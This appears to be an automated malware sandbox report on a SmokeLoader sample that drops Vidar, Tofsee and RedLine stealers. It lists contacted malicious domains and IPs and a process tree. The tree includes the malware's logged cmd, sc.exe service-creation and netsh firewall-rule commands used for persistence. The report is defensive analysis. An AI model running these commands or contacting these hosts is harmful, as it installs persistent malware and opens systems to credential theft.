• mpabshq.org
• ubyvpwxipt.net
• privacy-tools-for-you-780.com
• pxnotaacu.org
• lnpyohcdyx.com
• unicupload.top
• byfupx.org
• iijrpdo.org
• ntsddipn.org
• vkaflekmve.net
• seaed.com
• obclg.net
• pgydqikexd.org
• gminomh.net
• 185.7.214.171:8080
• tgajiadc.net
• xvuvc.org
• tdosgx.net
• npqwstsduq.net
• ouyysee.net
• rtqpowrk.org
• hhpljg.org
• ipycpcfbe.com
• sdstpsloir.org
• tfxyjpgh.net
• ycdbyxqt.net
• gcfxlgitg.org
• afdvsashlg.com
• kapjpsnnjq.org
• kcsjausffk.com
• djmmsjo.net
• ipjoaoftf.net
• sdkmuxkbh.org
• vomuxg.org
• fjenisnthl.net
• pixmwg.net
• mwbuboe.net
• pylkam.org
• fdhqx.net
• pslqekdvh.org
• ecicwppql.net
• tlwsaw.net
• krrkfa.com
• gfydmobm.net
• uhdak.net
• assuf.net
• rblisqqaii.com
• xnvwvqck.com
• vltihla.com
• qnqlcbx.com
• 185.215.113.35
• flqhri.com
• poqgfb.net
• oycnsawak.org
• 81.163.30.181
• 185.163.204.22
• 185.163.204.24
• ylanbcfwv.net
• yxorycdxma.net
• tcqdnx.net

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 12:28:30
Start date: 14/01/2022
Path: C:\Users\user\Desktop\sbxGIUIhRd.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\sbxGIUIhRd.exe"
Imagebase: 0x400000
File size: 320000 bytes
MD5 hash: F768F4A81E8B87D6990895A35B8D7D6C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 12:28:31
Start date: 14/01/2022
Path: C:\Users\user\Desktop\sbxGIUIhRd.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\sbxGIUIhRd.exe"
Imagebase: 0x400000
File size: 320000 bytes
MD5 hash: F768F4A81E8B87D6990895A35B8D7D6C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.719013921.0000000000580000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.719027443.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security
Reputation: low

General

Start time: 12:28:38
Start date: 14/01/2022
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.706607181.0000000004DC1000.00000020.00020000.sdmp, Author: Joe Security
Reputation: high

General

Start time: 12:28:40
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6eb840000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:29:00
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6eb840000
File size: 51288 bytes
                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:12
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\adijaeg
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\adijaeg
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:320000 bytes
                                                                                                                                                                                            MD5 hash:F768F4A81E8B87D6990895A35B8D7D6C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:14
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\adijaeg
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\adijaeg
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:320000 bytes
                                                                                                                                                                                            MD5 hash:F768F4A81E8B87D6990895A35B8D7D6C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.767064606.0000000000561000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.766964771.0000000000420000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:15
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                            Imagebase:0x7ff6eb840000
                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:16
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\8A6B.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\8A6B.exe
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:301056 bytes
                                                                                                                                                                                            MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:18
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\95C6.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\95C6.exe
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:320000 bytes
                                                                                                                                                                                            MD5 hash:F768F4A81E8B87D6990895A35B8D7D6C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:19
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                            Imagebase:0x7ff6eb840000
                                                                                                                                                                                            File size:51288 bytes
                                                                                                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:19
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6760 -ip 6760
                                                                                                                                                                                            Imagebase:0x1160000
                                                                                                                                                                                            File size:434592 bytes
                                                                                                                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:high

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:20
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\95C6.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\95C6.exe
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:320000 bytes
                                                                                                                                                                                            MD5 hash:F768F4A81E8B87D6990895A35B8D7D6C
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000010.00000002.787707490.0000000002051000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000010.00000002.787566424.0000000002030000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            Reputation:low

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:21
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 520
Imagebase: 0x1160000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:29:22
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\CFE8.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\CFE8.exe
Imagebase: 0x400000
File size: 323072 bytes
MD5 hash: E1AF41681888A847863EE17BD63450A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 12:29:27
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\E2A6.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\E2A6.exe
Imagebase: 0x400000
File size: 320000 bytes
MD5 hash: E4B33586BFDB5A9CD45F3038B8F4CCBD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000013.00000002.803426452.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000013.00000003.785124178.0000000000580000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000013.00000002.803137475.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML

General

Start time: 12:29:29
Start date: 14/01/2022
Path: C:\Users\user\AppData\Local\Temp\FA5C.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\FA5C.exe
Imagebase: 0x530000
File size: 537088 bytes
MD5 hash: D7DF01D8158BFADDC8BA48390E52F355
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000015.00000002.833273258.0000000003971000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML

General

Start time: 12:29:30
Start date: 14/01/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff6eb840000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 12:29:32
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\txlhcyih\
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 12:29:32
Start date: 14/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 12:29:33
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 12:29:33
Start date: 14/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 12:29:34
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support
Imagebase: 0x20000
File size: 60928 bytes
MD5 hash: 24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 12:29:34
Start date: 14/01/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 12:29:35
Start date: 14/01/2022
Path: C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\sc.exe" description txlhcyih "wifi internet conection
Imagebase: 0x20000
File size: 60928 bytes
MD5 hash: 24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 12:29:36
Start date: 14/01/2022
Path: C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff724c50000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:36
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\System32\sc.exe" start txlhcyih
                                                                                                                                                                                            Imagebase:0x20000
                                                                                                                                                                                            File size:60928 bytes
                                                                                                                                                                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:37
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff724c50000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:37
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                            Imagebase:0x9f0000
                                                                                                                                                                                            File size:82944 bytes
                                                                                                                                                                                            MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:37
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d"C:\Users\user\AppData\Local\Temp\E2A6.exe"
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            File size:12005888 bytes
                                                                                                                                                                                            MD5 hash:6D07EFE4270BD10431D8E32CADCFF4E7
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000023.00000002.809196350.0000000000630000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000023.00000003.805779040.0000000000650000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000023.00000002.808208197.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000023.00000002.809631719.0000000000850000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:38
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            Imagebase:0x7ff724c50000
                                                                                                                                                                                            File size:625664 bytes
                                                                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:39
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:svchost.exe
                                                                                                                                                                                            Imagebase:0x110000
                                                                                                                                                                                            File size:44520 bytes
                                                                                                                                                                                            MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000026.00000002.979557466.0000000002360000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                            General

                                                                                                                                                                                            Start time:12:29:43
                                                                                                                                                                                            Start date:14/01/2022
                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\FA5C.exe
                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\FA5C.exe
                                                                                                                                                                                            Imagebase:0xab0000
                                                                                                                                                                                            File size:537088 bytes
                                                                                                                                                                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000002.933081162.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.824314083.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.824767570.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.823843288.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000027.00000000.825252840.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                            Disassembly

                                                                                                                                                                                            Code Analysis
